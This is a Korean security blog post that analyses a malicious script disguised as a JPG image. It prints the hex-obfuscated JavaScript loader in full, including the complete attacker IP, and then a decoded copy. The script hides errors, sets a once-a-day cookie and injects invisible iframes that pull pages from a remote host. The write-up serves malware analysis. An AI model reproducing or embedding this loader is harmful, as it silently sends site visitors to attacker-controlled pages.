본문 바로가기

security/악성코드 유포

Jpg 파일로 위장한 악성 Script !!

js.jpg로 위장한 악성코드 스크립트가 있어서 올려봅니다.

언뜻 보기에는 일반 사진 같습니다.

하지만 속에는 그 무언가 다른 존재가 존재하고 있지요.....



var NjKS1="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
var NjKS1="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
var NjKS1="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
window["\x6f\x6e\x65\x72\x72\x6f\x72"]=function(){return true;}
var NjKS1="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
var NjKS1="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
if(window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"]["\x69\x6e\x64\x65\x78\x4f\x66"]('\x67\x72\x67\x78\x37\x64\x6f\x35\x37\x36\x33\x32\x65\x36\x35')==-1){
var gO6="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
 var dlENc7=new window["\x44\x61\x74\x65"]();
var gO6="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
 dlENc7["\x73\x65\x74\x54\x69\x6d\x65"](dlENc7["\x67\x65\x74\x54\x69\x6d\x65"]()+24*60*60*1000);
var gO6="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
var gO6="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
 window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"]='\x67\x72\x67\x78\x37\x64\x6f\x35\x37\x36\x33\x32\x65\x36\x35\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d'+dlENc7["\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67"]();
var gO6="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
 window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x74\x69\x74\x6c\x65"]=window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x74\x69\x74\x6c\x65"]["\x72\x65\x70\x6c\x61\x63\x65"](/\<(\w|\W)*\>/,"");
var gO6="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
var GPKw13="\x68\x74\x74\x70\x3a\x2f\x2f";
var s14="";
 window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"](""+"\x3c\x69\x66\x72\x61"+s14+"\x6d\x65 \x73\x72\x63\x3d"+GPKw13+"\x32\x30\x34\x2e\x31\x38\x38\x2e\x32\x34\x33\x2e\x31\x33\x31\x2f\x72\x65\x74\x6b\x63\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\x2f\x69\x66\x72"+s14+"\x61\x6d\x65\x3e");
var gO6="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
 window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"](""+"\x3c\x69\x66"+s14+"\x72\x61\x6d\x65 \x73\x72\x63\x3d"+GPKw13+"\x32\x30\x34\x2e\x31\x38\x38\x2e\x32\x34\x33\x2e\x31\x33\x31\x2f\x72\x65\x74\x6b\x6c\x2e\x68\x74\x6d \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\x2f\x69\x66"+s14+"\x72\x61\x6d\x65\x3e");
var gO6="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
 window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x69\x66\x72"+s14+"\x61\x6d\x65 \x73\x72\x63\x3d\x68\x74\x74\x70\x3a\/\/\x32\x30\x34\x2e\x31\x38\x38\x2e\x32\x34\x33\x2e\x31\x33\x31\/\x63\x6f\x75\x6e\x74\x2e\x68\x74\x6d\x6c \x77\x69\x64\x74\x68\x3d\x30 \x68\x65\x69\x67\x68\x74\x3d\x30\x3e\x3c\/\x69\x66\x72"+"\x61\x6d\x65\x3e");
var gO6="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
var gO6="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";
}
var NjKS1="\x67\x72\x65\x72\x35\x39\x36\x61\x52\x54\x36\x37\x68\x72\x67\x72\x67\x68\x72\x67\x37\x65\x36\x38\x68\x74\x66\x65\x6a\x67\x68\x66\x67\x72\x65\x72\x67\x68\x36\x33\x32\x65\x36\x35";

다음과 같은 코드들이 위장한 파일 속에는 들어있음을 알 수 있습니다 !

다시 그것을 리플레이스 해준다면 본 모습을 다음과 같이 볼 수 있습니다 !

var NjKS1="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
var NjKS1="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
var NjKS1="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
window["onerror"]=function(){return true;}
var NjKS1="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
var NjKS1="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
if(window["document"]["cookie"]["indexOf"]('grgx7do57632e65')==-1){
var gO6="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
 var dlENc7=new window["Date"]();
var gO6="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
 dlENc7["setTime"](dlENc7["getTime"]()+24*60*60*1000);
var gO6="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
var gO6="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
 window["document"]["cookie"]='grgx7do57632e65=Yes;path=;expires='+dlENc7["toGMTString"]();
var gO6="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
 window["document"]["title"]=window["document"]["title"]["replace"](/<(/w|/W)*/>,"");
var gO6="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
var GPKw13="http:";
var s14="";
 window["document"]["write"](""+"<iframe src=http://204.188.[생략].131/retkc.htm width=0 height=0><iframe>");
var gO6="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
 window["document"]["write"](""+"<iframe src=http://204.188.[생략].131/retkl.htm width=0 height=0><iframe>");
var gO6="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
 window["document"]["writeln"]("<iframe src=http://204.188.[생략].131/count.html width=0 height=0></ifr"+"ame>");
var gO6="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
var gO6="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";
}
var NjKS1="grer596aRT67hrgrghrg7e68htfejghfgrergh632e65";

나머지 스크립트는 제가 도전하고 있기에 아는곳인 여기까지 서술 합니다 !!!!!!